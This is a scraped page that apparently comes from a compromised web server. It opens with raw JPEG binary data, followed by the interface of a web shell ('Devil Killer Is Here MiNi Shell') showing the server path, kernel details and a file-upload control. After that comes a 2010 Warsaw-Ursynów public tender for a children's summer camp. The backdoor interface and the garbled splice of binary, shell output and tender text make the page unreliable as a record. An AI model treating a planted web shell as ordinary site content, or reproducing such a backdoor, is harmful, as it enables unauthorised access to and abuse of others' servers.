JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100527/146558-N-2010.html

<p class="kh_header"><b>Warszawa: Zorganizowanie wypoczynku letniego z programem profilaktycznym dla 96 dzieci z Dzielnicy Ursynów m.st. Warszawy, z podziałem na 2 turnusy:
a)	Turnus I: nad morzem, lub w górach
b)	Turnus II: nad morzem, lub jeziorem</b><br>
<b>Numer ogłoszenia: 146558 - 2010; data zamieszczenia: 27.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa Dzielnica Ursynów , al. Komisji Edukacji Narodowej 61, 02-777 Warszawa, woj. mazowieckie, tel. 022 5457100, faks 022 5457291.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ursynow.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie wypoczynku letniego z programem profilaktycznym dla 96 dzieci z Dzielnicy Ursynów m.st. Warszawy, z podziałem na 2 turnusy:
a)	Turnus I: nad morzem, lub w górach
b)	Turnus II: nad morzem, lub jeziorem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Zorganizowanie wypoczynku letniego z programem profilaktycznym dla 96 dzieci w wieku 8 - 12 lat z Dzielnicy Ursynów m.st. Warszawy, z podziałem na 2 turnusy:
a.Turnus I: nad morzem, lub w górach
b.Turnus II: nad morzem, lub jeziorem

1. Zamawiający preferuje, aby turnusy odbyły się w różnych miejscach w Polsce tak, aby dzieci mogły wybrać miejsce wyjazdu według własnych preferencji i zainteresowań.

Zamawiający dopuszcza następujące warianty realizacji zamówienia:

a.dwa turnusy odbywają się w różnych miejscach i różnym czasie np. jeden w górach jako pierwszy, drugi nad morzem jako drugi
b.dwa turnusy odbywają się w różnych miejscach w jednym czasie np. jeden w górach, drugi nad morzem w tym samym terminie
c.dwa turnusy odbywają się w jednym miejscu w różnym czasie (dotyczy zorganizowania wypoczynku nad morzem) 
d.dwa turnusy odbywają się w jednym miejscu w tym samym czasie (dotyczy zorganizowania wypoczynku nad morzem)

Przewidywana liczba dzieci na każdym z turnusów nie może być większa niż 48 osób.

2. Zamawiający przewiduje zakres zamówienia zgodnie z przepisami określonymi w:
a) rozporządzeniu Ministra Edukacji Narodowej z dnia 21 stycznia 1997 r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad organizowania i nadzorowania (Dz. U. z 1997 r.  Nr 12 poz. 67 z późn. zm.) 
b) rozporządzeniu Ministra Edukacji i Sportu z dnia 8 listopada 2001 r. w sprawie warunków i sposobu organizowania  i nadzorowania przez publiczne przedszkola i placówki krajoznawstwa i turystyki (Dz. U. Nr 135 poz. 1516)
c) rozporządzeniu Rady Ministrów z dnia 6 maja 1997 r. w sprawie określania warunków w sprawie określania bezpieczeństwa osób przebywających w górach, kąpiących się, pływających i uprawiających sporty wodne (Dz. U. Nr 57 poz. 358);
d) ustawie z dnia 29 sierpnia 1997 r. o usługach turystycznych (tekst jednolity -
Dz. U. z 2004 Nr 223, poz. 2268, z późn. zm.).

3.Zakres zamówienia:
Miejsce realizacji usługi: Polska:
Turnus I: nad morzem, lub w górach
Turnus II: nad morzem, lub jeziorem
z nieodpłatnym dostępem do kąpieliska i obiektów sportowych. 
Termin realizacji usługi: 14 dniowe turnusy, w okresie od  26.VI. do 31.VIII.2010 r., w terminach turnusów podanych przez wykonawcę.
Liczba dzieci OGÓŁEM - 96, przy czym:
a)liczba dzieci pozostających pod opieką 1 wychowawcy - do 12;
b)ostateczna wielkość zamówienia może ulec zmianie w zależności od faktycznej liczby dzieci.

4. Wymagania dotyczące placówki wypoczynku:
a)wykonawca wypoczynku letniego zapewni możliwość korzystania z kąpieliska położonego do 500 m od placówki, spełniającego wymogi bezpieczeństwa i czystości wody oraz zapewni opiekę wykwalifikowanych ratowników w liczbie stosownej do liczby uczestników turnusów;
b)placówka musi znajdować się na terenie oświetlonym, strzeżonym, z dala od głównych szos, torowisk i dużych zakładów przemysłowych;
c)placówka musi być zarejestrowana we właściwym Kuratorium Oświaty.

5. Dodatkowe wymagania:
a)możliwość nieograniczonego korzystania z boiska bez konieczności dojazdu;
b)plac zabaw;
c)sala przystosowana do prowadzenia zajęć dydaktycznych;
d)możliwość nieodpłatnego korzystania ze sprzętu sportowego niezbędnego 
do uatrakcyjnienia zajęć, w liczbie dostosowanej do liczby uczestników przebywających na poszczególnych turnusach, w tym, co najmniej piłki, skakanki, sprzęt do badmintona, i ping-ponga;
e)możliwość nieodpłatnego korzystania ze sprzętu TV;
f)stołówka na terenie obiektu.

6. Wymagania dotyczące zakwaterowania:
a)zakwaterowanie dzieci wraz z kadrą możliwe jest w takich obiektach jak: dom wczasowy, ośrodek kolonijny, ośrodek sportu i rekreacji, w pokojach nie więcej niż 4-osobowych - zamawiający nie dopuszcza możliwości zakwaterowania dzieci w namiotach, domkach kempingowych lub budynkach szkolnych;
b)minimalne wyposażenie pokoi to: łóżka do spania (z wyłączeniem łóżek piętrowych,  polowych, rozkładanych i tzw. dostawek), szafa ubraniowa, szafki małe stojące, półki oraz wieszaki, umożliwiające rozpakowanie bagażu przez każde dziecko;  
c)1 łazienka na pokój (natrysk z bieżąca wodą + wc), pokoje i łazienki muszą być estetyczne i czyste, wyposażone zgodnie z wymaganiami sanitarno-higienicznymi 
dla obiektów, w których zlokalizowany będzie wypoczynek.

7. Wymagania dotyczące wyżywienia:
a)cztery posiłki dziennie (śniadanie, obiad, podwieczorek i kolacja) zgodnie z zasadami racjonalnego żywienia, określonymi w obowiązujących przepisach prawa;
b)posiłki mają być urozmaicone, sycące, odpowiadające normom zarówno pod względem ilości, jakości, jak i wartości odżywczych. Wsad do kotła wynosić będzie nie mniej niż 20 zł. Pierwszym posiłkiem będzie obiadokolacja w dniu przyjazdu dzieci, zaś ostatnim posiłkiem będzie śniadanie w dniu odjazdu;
c)wykonawca wypoczynku zapewni dzieciom suchy prowiant (np.: woda, kanapki, owoc, wafelek) na drogę powrotną i w czasie wycieczek;
d)wykonawca wypoczynku zapewni dzieciom przez cały dzień dostęp do napojów oraz pieczywa z masłem i dżemem;
e)niedopuszczalne jest podawanie posiłków w formie szwedzkiego stołu,
f)miejsce przeznaczone do spożycia posiłków - stołówka musi być wydzielona 
od pozostałych pomieszczeń, z których korzystają uczestnicy i znajdować się na terenie ośrodka wypoczynku;
g)wykonawca będzie przygotowywał posiłki zgodnie z zasadami określonymi w ustawie o bezpieczeństwie żywności i żywienia (Dz. U. z 2006 r. Nr 171 poz. 1225) łącznie z przepisami wykonawczymi do tej ustawy. 

8. Wymagania dotyczące zaplecza kulturalno-sportowego
a)co najmniej jedna duża świetlica (pomieszczenie odrębne niż jadalnia) - sala 
z możliwością zorganizowania dyskotek, konkursów, turniejów itp. oraz przystosowana do prowadzenia zajęć edukacyjnych, rekreacyjno-sportowych;
b)pomieszczenia przeznaczone na świetlice muszą znajdować się na terenie ośrodka wypoczynku;
c)boisko i sprzęt sportowy do organizowania zawodów dostosowane do potrzeb uczestników;
d)materiały do zajęć w ilości zabezpieczającej potrzeby wszystkich uczestników (np. gry planszowe, materiały plastyczne, techniczne, sprzęt sportowy);
e)w obiekcie musi znajdować się także sprzęt nagłaśniający do prowadzenia dyskotek i konkursów.

9. Wymagania dotyczące programu:
a)wykonawca w zakresie zorganizowanych turnusów ma przygotować program rekreacyjno-edukacyjny skierowany do dzieci w wieku 8-12 lat, program zajęć powinien być zorganizowany na czas pogody i niepogody;
b)co najmniej dwie całodniowe wycieczki autokarowe z nieodpłatnym wstępem 
do zwiedzanych obiektów, z zabezpieczonym wyżywieniem, prowiantem i napojami;
c)dwie wycieczki piesze;
d)co najmniej cztery dyskoteki;
e)co najmniej dwa ogniska połączone z pieczeniem kiełbasek;
f)zorganizowanie zawodów sportowych z nagrodami, konkursów artystycznych 
z nagrodami;
g)wykonawca zapewni program profilaktyki uzależnień spełniający standard jakości programów profilaktycznych (załącznik nr 8 do SIWZ) zgodnie z Programem Profilaktyki i Rozwiązywania Problemów Alkoholowych m.st. Warszawy na rok 2010. Program powinien być prowadzony przez psychologa/pedagoga minimum 2 razy w tygodniu z każdą grupą, przez nie więcej niż 1 godzinę każdorazowo. 

10 Wymagania dotyczące kadry:
a)wychowawcami mogą być osoby posiadające kwalifikacje zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 21 stycznia 1997 r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad organizowania i nadzorowania (Dz. U. z 1997 r.  Nr 12 poz. 67 z późn. zm.)
b)jeden wychowawca powinien mieć pod opieką maksymalnie 12 uczestników;
c)wychowawcy winni mieć skończone 18 lat i posiadać doświadczenie w pełnieniu funkcji wychowawcy w pracy z młodzieżą, zdobyte na obozie, lub kolonii co najmniej 1 raz w okresie ostatnich trzech lat;
d)kierownikiem turnusu może być: nauczyciel, czynny instruktor harcerski od stopnia podharcmistrza włącznie lub inna osoba, posiadająca co najmniej trzyletni staż pracy opiekuńczo-wychowawczej lub dydaktyczno-wychowawczej;
e)kierownik turnusu musi posiadać zaświadczenie o ukończeniu kursu dla kierowników wypoczynku, obowiązek ten nie dotyczy osób zajmujących stanowiska kierownicze 
w szkołach i placówkach;
f)kierownik turnusu nie może być jednocześnie wychowawcą grupy;
g)psycholog/pedagog, który będzie realizował program profilaktyczny na turnusie, powinien posiadać kwalifikacje do prowadzenia zajęć profilaktycznych, będzie również wspierać wychowawców w procesie opiekuńczo-wychowawczym, a zwłaszcza w trudnych sytuacjach podczas trwania turnusu;
h)psycholog/pedagog nie może być jednocześnie wychowawcą grupy, ale powinien być dostępny dla dzieci przez co najmniej 8 godzin dziennie;
i)psycholog/pedagog zakończy każdy turnus sprawozdaniem z realizacji programu profilaktycznego;
j)opieka ratownika w czasie kąpieli pozostającego do dyspozycji uczestników przez cały okres wypoczynku
11. Opieka medyczna:
a)całodobowa opieka medyczna - pielęgniarka na terenie ośrodka, dostępna przez cały czas trwania wypoczynku w zależności od potrzeb dzieci, lub zapewnienie w koniecznych przypadkach opieki lekarskiej polegającej na wezwaniu lekarza do ośrodka lub dowiezienia uczestnika pobytu do przychodni bezpłatnym transportem w ramach ubezpieczenia zdrowotnego;
b)zaopatrzenie ambulatorium placówki wypoczynku w podstawowe leki, środki opatrunkowe i higieniczne - wydawane uczestnikom bezpłatnie zgodnie z zaleceniami pielęgniarskimi lub lekarskimi.

12. Dojazd i powrót:
a)wykonawca zapewni dojazd uczestnikom wypoczynku z Warszawy do miejsca wypoczynku i z powrotem oraz na wycieczki własnymi lub udostępnionymi przez firmę przewozową klimatyzowanymi autokarami. Wyjazd w godzinach rannych, nie później niż o godz. 10.00, powrót w godzinach popołudniowych, nie później niż o godz. 20.00
b)wykonawca zobowiązany jest do zapewnienia opieki wychowawców w czasie powrotu dzieci oraz do czasu ich odbioru przez rodzica/opiekuna prawnego z miejsca przyjazdu;
c)wykonawca odpowiada za stan techniczny autokarów oraz dopełnienie wszystkich wymogów ustalonych przy przewozach dzieci;
d)ubezpieczenie dzieci i kadry od NW w czasie podróży i w czasie pobytu na turnusie.

13. Istotne warunki zamówienia:
a)wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo i opiekę nad dziećmi w czasie podróży, jak i pobytu, w ramach kosztów ujętych w oferowanej cenie za przedmiot zamówienia;
b)wykonawca ponosi pełną odpowiedzialność za wszelkie szkody wyrządzone przez uczestników turnusu;
c)zamawiający zastrzega sobie prawo kontroli, w każdym czasie i każdym zakresie związanym z realizacją zadania. Zamawiającego reprezentować będzie oddelegowany pracownik. Wykonawca zapewni mu odpowiednie warunki pracy i zakwaterowania oraz pokryje koszty jego pobytu;
d)zamawiający zastrzega sobie możliwość przeprowadzenia wizji lokalnej w zaoferowanych obiektach przed rozstrzygnięciem postępowania, celem oceny zgodności oferty wykonawcy z wymaganiami treści SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.24.00.00-4, 63.50.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości 3.000,00 złotych (słownie: trzy tysiące złotych</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada uprawnienia do prowadzenia działalności w oparciu o ustawę z dnia 29 sierpnia 1997 r. o usługach turystycznych (Dz. U. z 2004 Nr 223 poz.2268) i jest wpisany do rejestru organizatorów turystyki i pośredników turystycznych, prowadzonego przez właściwego ze względu na siedzibę przedsiębiorcy marszałka województwa.

Ocena spełniania warunków udziału w postępowaniu dokonana zostanie w systemie 1 lub 0, zgodnie z formułą spełnia-nie spełnia w oparciu o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych w pkt III.4.1) Ogłoszenia. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie) wykonał co najmniej dwie usługi polegające na zorganizowaniu dla minimum 90 uczestników (dzieci lub młodzieży) wypoczynku letniego lub zimowego (w szczególności kolonii lub obozu).

Ocena spełniania warunków udziału w postępowaniu dokonana zostanie w systemie 1 lub 0, zgodnie z formułą spełnia-nie spełnia w oparciu o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych w pkt. III.4.1) Ogłoszenia. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia tj. w zakresie każdego z turnusów Wykonawca dysponuje:

a.co najmniej jedną osobą pełniącą funkcję kierownika wypoczynku (turnusu)
b.co najmniej 4 osobami pełniącymi obowiązki wychowawców
c.co najmniej jednym pedagogiem/psychologiem
d.co najmniej jednym  ratownikiem WOPR
e.co najmniej jedną osobą pełniącą obowiązki pomocy medycznej (pielęgniarka)

UWAGA!!!
W przypadku gdy Wykonawca zorganizuje jednocześnie 2 turnusy w jednym miejscu i terminie (dotyczy wypoczynku nad morzem) Wykonawca zobowiązany jest dysponować osobami zdolnymi do wykonania zamówienia tj. Wykonawca dysponuje:

a.co najmniej jedną osobą pełniącą funkcję kierownika wypoczynku (turnusów)
b.co najmniej 8 osobami pełniącymi obowiązki wychowawców
c.co najmniej jednym pedagogiem/psychologiem
d.co najmniej jednym ratownikiem WOPR
e.co najmniej jedną osobą pełniącą obowiązki pomocy medycznej (pielęgniarka)


Szczegółowe warunki dotyczące powyższych osób:

a) osoba wyznaczona do sprawowania funkcji kierownika wypoczynku letniego musi posiadać uprawnienia MEN (Dz.U. z 2009 r. Nr 218 poz. 1696 z dnia 2009 r.) 

Kierownikiem turnusu może być:
- nauczyciel, czynny instruktor harcerski od stopnia podharcmistrza włącznie, lub inna osoba, posiadająca co najmniej trzyletni staż pracy opiekuńczo-wychowawczej lub dydaktyczno-wychowawczej,
- kierownik turnusu musi posiadać zaświadczenie o ukończeniu kursu dla kierowników wypoczynku, obowiązek ten nie dotyczy osób zajmujących stanowiska kierownicze w szkołach i placówkach;

b) osoby wyznaczone do sprawowania funkcji wychowawców muszą posiadać uprawnienia MEN (Dz. U. z 2009 r. Nr 218 poz. 1696 z dnia 2009 r.) 
Wychowawcami mogą być:
- nauczyciele,
- studenci szkół wyższych kierunków i specjalności, których program obejmuje   przygotowanie pedagogiczne, po odbyciu odpowiedniego przeszkolenia,
- słuchacze kolegiów nauczycielskich i nauczycielskich kolegiów językowych, po odbyciu  odpowiedniego przeszkolenia,
- osoby posiadające zaświadczenia o ukończeniu kursu dla wychowawców kolonijnych, obejmującego program określony w załączniku nr 4 do rozporządzenia,
- instruktorzy harcerscy od stopnia przewodnika włącznie,
- przodownicy turystyki kwalifikowanej oraz instruktorzy Polskiego Towarzystwa Turystyczno-Krajoznawczego,
- trenerzy i instruktorzy sportowi;

c) osoba wyznaczona do sprawowania funkcji psychologa/pedagoga musi  posiadać  kwalifikacje do prowadzenia zajęć profilaktycznych (przebyte kursy, szkolenia z zakresu profilaktyki uzależnień)

d) osobą świadcząca całodobową opiekę medyczną musi być pielęgniarka z uprawnieniami zgodnie z ustawą o zawodach pielęgniarki i położnej (Dz. U. 1996 r. nr 91 poz. 410) która będzie obecna w placówce wypoczynku 24 h na dobę.

e) osoba będąca ratownikiem, musi posiadać uprawnienia zawodowe WOPR w stopniu Ratownika Wodnego Morskiego lub uprawnienia zdobyte przed dniem 1 styczeń 2009 r.

Ocena spełniania warunków udziału w postępowaniu dokonana zostanie w systemie 1 lub 0, zgodnie z formułą spełnia-nie spełnia w oparciu o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych w pkt III.4.1) Ogłoszenia.  Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz ofertowy, zgodny z treścią załącznika nr 1 do SIWZ. Zabronione jest wprowadzanie jakichkolwiek zmian w treści formularza ofertowego;
2. Wypełniony formularz cenowy, zgodny z treścią załącznika nr 2 do SIWZ.
3. Opis miejsca wypoczynku wraz z programem zajęć (zgodnie z załącznikami  nr 9 i 10 do SIWZ).
4. Dowód wniesienia wadium
Uwaga! 
1.W przypadku, gdy Wykonawca nie dołączy do oferty niniejszego dokumentu, a wadium zostało wniesione do Zamawiającego zgodnie z wymaganiami określonymi w SIWZ, powyższe nie zostanie uznane jako brak wniesienia wadium.
2.W przypadku Wykonawców wspólnie ubiegających się o udzielenie przedmiotowego zamówienia, wystarczającym dla skutecznego złożenia wadium w postępowaniu jest, aby dokument potwierdzający wniesienie wadium wystawiony był na jednego z uczestników konsorcjum ubiegającego się o dane zamówienie, o ile treść pełnomocnictwa, o którym mowa w 14.2.5. SIWZ, bądź treść dokumentu wadialnego nie zawiera szczególnych, odmiennych postanowień w tym względzie.

5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają  pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Niniejsze pełnomocnictwo musi określać: temat postępowania, którego dotyczy pełnomocnictwo, wykonawców (nazwy (firmy) ubiegających się o udzielenie zamówienia, wskazanie - pełnomocnika, zakres umocowania. 
